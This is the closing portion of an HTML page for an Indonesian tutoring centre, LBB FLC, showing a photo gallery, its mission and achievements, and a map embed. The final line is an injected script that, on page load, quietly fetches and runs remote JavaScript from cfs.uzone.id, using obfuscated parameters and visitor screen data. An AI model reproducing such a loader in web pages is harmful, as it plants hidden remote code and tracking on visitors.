      </div>
      <div class="col-md-3 col-sm-6 co-xs-12 gal-item">
        <div class="box"> <a href="javascript:void(0)" data-toggle="modal" data-target="#3">
          <div class="caption">
            <h4>Trofi Bagi Juara 1 dan 2 Untuk Try Out se-Mojokerto - Jombang</h4>
            <!-- <p>Lorem Ipsum is simply dummy text of the printing</p> -->
            <i class="fa fa-search" aria-hidden="true"></i> </div>
          <img src="images/tryout2.jpg" alt="Gallery Image"> </a>
          <div class="modal fade" id="3" tabindex="-1" role="dialog">
            <div class="modal-dialog" role="document">
              <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
                <div class="modal-body"> <img src="images/tryout2.jpg" alt="Gallery Image"> </div>
                <div class="col-md-12 description">
                  <h4>Trofi Bagi Juara 1 dan 2 Untuk Try Out se-Mojokerto - Jombang</h4>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 co-xs-12 gal-item">
        <div class="box"> <a href="javascript:void(0)" data-toggle="modal" data-target="#4">
          <div class="caption">
            <h4>Hadiah Tablet Dari FLC Setelah Mengajak 10 Temannya Untuk Bergabung Di FLC</h4>
            <!-- <p>Lorem Ipsum is simply dummy text of the printing</p> -->
            <i class="fa fa-search" aria-hidden="true"></i> </div>
          <img src="images/ajaktemandapattab.jpg" alt="Gallery Image"> </a>
          <div class="modal fade" id="4" tabindex="-1" role="dialog">
            <div class="modal-dialog" role="document">
              <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
                <div class="modal-body"> <img src="images/ajaktemandapattab.jpg" alt="Gallery Image"> </div>
                <div class="col-md-12 description">
                  <h4>Hadiah Tablet Dari FLC Setelah Mengajak 10 Temannya Untuk Bergabung Di FLC</h4>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 co-xs-12 gal-item">
        <div class="box"> <a href="javascript:void(0)" data-toggle="modal" data-target="#5">
          <div class="caption">
            <h4>Suasana Belajar Bahasa Inggris Berbasis Multimedia</h4>
            <!-- <p>Lorem Ipsum is simply dummy text of the printing</p> -->
            <i class="fa fa-search" aria-hidden="true"></i> </div>
          <img src="images/Capture.PNG" alt="Gallery Image"> </a>
          <div class="modal fade" id="5" tabindex="-1" role="dialog">
            <div class="modal-dialog" role="document">
              <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
                <div class="modal-body"> <img src="images/Capture.PNG" alt="Gallery Image"> </div>
                <div class="col-md-12 description">
                  <h4>Suasana Belajar Bahasa Inggris Berbasis Multimedia</h4>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 co-xs-12 gal-item">
        <div class="box"> <a href="javascript:void(0)" data-toggle="modal" data-target="#6">
          <div class="caption">
            <h4>Alumni LBB FLC SMK Teknik Komputer Jaringan</h4>
            <p>Lorem Ipsum is simply dummy text of the printing</p>
            <i class="fa fa-search" aria-hidden="true"></i> </div>
          <img src="images/Capture1.PNG" alt="Gallery Image"> </a>
          <div class="modal fade" id="6" tabindex="-1" role="dialog">
            <div class="modal-dialog" role="document">
              <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
                <div class="modal-body"> <img src="images/Capture1.PNG" alt="Gallery Image"> </div>
                <div class="col-md-12 description">
                  <h4>Alumni LBB FLC SMK Teknik Komputer Jaringan</h4>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 co-xs-12 gal-item">
        <div class="box"> <a href="javascript:void(0)" data-toggle="modal" data-target="#7">
          <div class="caption">
            <h4>Grand Opening Cabang Prajurit Kulon</h4>
            <!-- <p>Lorem Ipsum is simply dummy text of the printing</p> -->
            <i class="fa fa-search" aria-hidden="true"></i> </div>
          <img src="images/grandopeningflcprajuritkulon.jpg" alt="Gallery Image"> </a>
          <div class="modal fade" id="7" tabindex="-1" role="dialog">
            <div class="modal-dialog" role="document">
              <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
                <div class="modal-body"> <img src="images/grandopeningflcprajuritkulon.jpg" alt="Gallery Image"> </div>
                <div class="col-md-12 description">
                  <h4>Grand Opening Cabang Prajurit Kulon</h4>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 co-xs-12 gal-item">
        <div class="box"> <a href="javascript:void(0)" data-toggle="modal" data-target="#8">
          <div class="caption">
            <h4>Ifa Harum S juara 1 "Kompetisi Sains Madrasah (KSM)" di bidang Matematika tingkat kabupaten, dan menjadi duta kab. Mojokerto ke tingkat Jawa Timur</h4>
            <!-- <p>Lorem Ipsum is simply dummy text of the printing</p> -->
            <i class="fa fa-search" aria-hidden="true"></i> </div>
          <img src="images/ifah.jpg" alt="Gallery Image"> </a>
          <div class="modal fade" id="8" tabindex="-1" role="dialog">
            <div class="modal-dialog" role="document">
              <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
                <div class="modal-body"> <img src="images/ifah.jpg" alt="Gallery Image"> </div>
                <div class="col-md-12 description">
                  <span style="font-size: 11px">Ifa Harum S juara 1 "Kompetisi Sains Madrasah (KSM)" di bidang Matematika tingkat kabupaten</span`>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>
<!-- Gallery End --> 
<!-- Contact Start -->
<section id="tentang" class="contactus">
  <div class="container">
    <h2>Tentang<br>
      <span>LBB FLC</span></h2>
    <div class="row">
      <div class="col-sm-4">
        <div class="contact-list">
        <br>
          <!-- <div class="center">
            <div class="contact-icon"><i class="fa fa-map-marker"></i></div>
          </div> -->
          <h3>Sekilas Pandang</h3>
          <h4></h4>
          BIMBEL FLC adalah lembaga bimbingan belajar yang ditujukan untuk siswa  1-6 SD, 7-9 SMP, 11-12 SMA, Alumni dan Umum. Kami hadir dan melayani dengan sistem terintegrasi dan akselerasi ditunjang dengan teknologi informasi. Kami membangun teori dan aplikasi dengan seimbang, sehingga akan melahirkan siswa-siswi yang unggul dan berprestasi 
          <h4></h4>
        </div>
      </div>
      <div class="col-sm-4">
        <div class="contact-list" style="height: 100%;min-height: 800px">
        <br>
          <!-- <div class="center">
            <div class="contact-icon"><i class="fa fa-phone"></i></div>
          </div> -->
          <h3>Visi - Misi - Motto</h3>
          <h4>Motto</h4>
          <p><blockquote>Mencetak Generasi Cerdas</blockquote></p>
          <h4>Visi</h4>
          <p><blockquote style="font-size:15px">Menjadi Lembaga Bimbingan Belajar yang Profesional, Berkualitas dan Terpercaya</blockquote></p>
          <h4>Misi</h4>
          <td>
            <div class="col-sm-1 col-md-1"></div>
            <div class="col-sm-11 col-md-11">
              <ul>
                <li>Mewujudkan bimbingan belajar yang berskala nasional</li>
                <li>Mendidik siswa meraih prestasi di tingkat lokal, nasional, dan global</li>
                <li>Memberikan metode yang unik, cepat, mudah dan menyenangkan</li>
                <li>Meningkatkan dan mengembangkan inovasi pembelajaran berbasis teknologi</li>
              </ul>
            </div>
          </td>
        </div>
      </div>
      <div class="col-sm-4">
        <div class="contact-list">
        <br>
          <!-- <div class="center">
            <div class="contact-icon"><i class="fa fa-envelope"></i></div>
          </div> -->
          <h3>Prestasi</h3>
          <h4></h4>
          <p>Melalui Bimbel FLC yang mana usianya masih terbilang cukup muda, kami telah berhasil mengantarkan peserta didik menuju prestasi tertinggi dengan meraih nilai UN tertinggi ke- 2 se- Jawa Timur, peringkat 1 tingkat lokal & regional serta banyaknya peserta didik kami diterima di PTN/PTK/PTS baik melalui jalur beasiswa dan non beasiswa</p>
        </div>
      </div>
    </div>
    <div class="row offset-top-60">
      <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d988.8181223609649!2d112.26153482917849!3d-7.54523467016689!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x0!2zN8KwMzInNDIuOSJTIDExMsKwMTUnNDMuNSJF!5e0!3m2!1sen!2sid!4v1496370021902" width="100%" height="400" frameborder="0" style="border:0" allowfullscreen></iframe>
    <br><br>
    </div>
  </div>
</section>

<!-- Contact End --> 
<!-- Copy Rights Start -->
<footer>
  <div class="container">
    <p>&copy; Copyright 
      <script type="text/javascript">
var d=new Date();
document.write(d.getFullYear());
</script> 
      LBB FLC</p>
  </div>
</footer>
<a id="scrool-top" href="javascript:void(0)"><i class="fa fa-long-arrow-up" aria-hidden="true"></i></a> 
<!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> 
<script src="assets/jquery/jquery-3.1.1.min.js"></script> 
<!-- Include all compiled plugins (below), or include individual files as needed --> 
<script src="assets/bootstrap/js/bootstrap.min.js"></script> 
<script src="assets/easing/jquery.easing.min.js"></script> 
<script src="assets/wow/wow.min.js"></script> 
<script src="assets/owl-carousel/js/owl.carousel.js"></script> 
<script src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssK5SwovMOVpS6%2b97sltHLOjtT5nf7RmoHNyIKbov%2f2o2UL6x82VyHamtT2bPAbnPEiZ6JmjVPC40zbPdGp9tKfUIAJDUuBEGUak%2fbcWQBJDdLeidD0QK0bZ9wWbX6z7muIQ3XG2pXeH%2fNGuhuGRTX92%2b%2f3GOk9xQ7JHDMqo9ht7%2bsQ7dqMBnGoljwR%2fTbQJwShbUofADOr59K%2buzRidDfRbt0jSx2%2beHDiVVqnGlimTltP34PWhSx54i9%2baKJqHdcnxe%2fHsNJBDK0EwNbUWH3fhjd9dwlBQe8EePTxFGYTxZELgJzGWN7U1kQOmYurSPWufNBUgd1glMeMfgf1hWRGOYCQkpMnt9F%2fTr8WaWtKkh9v5dUqPThwjeqnBTcVcnv%2bth8MysqmmBvdwfqV5nT49YXmzTRcZ9zXBjFp8%2bSEo0246n2VTETZ0YwRf9oPz1%2bBgoplDc5ePsYdlZ2v0FECBY2XLlh0MB%2bxjPq4hg4dnlyaN9fcT7XyqfgmgV87QjPZ" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
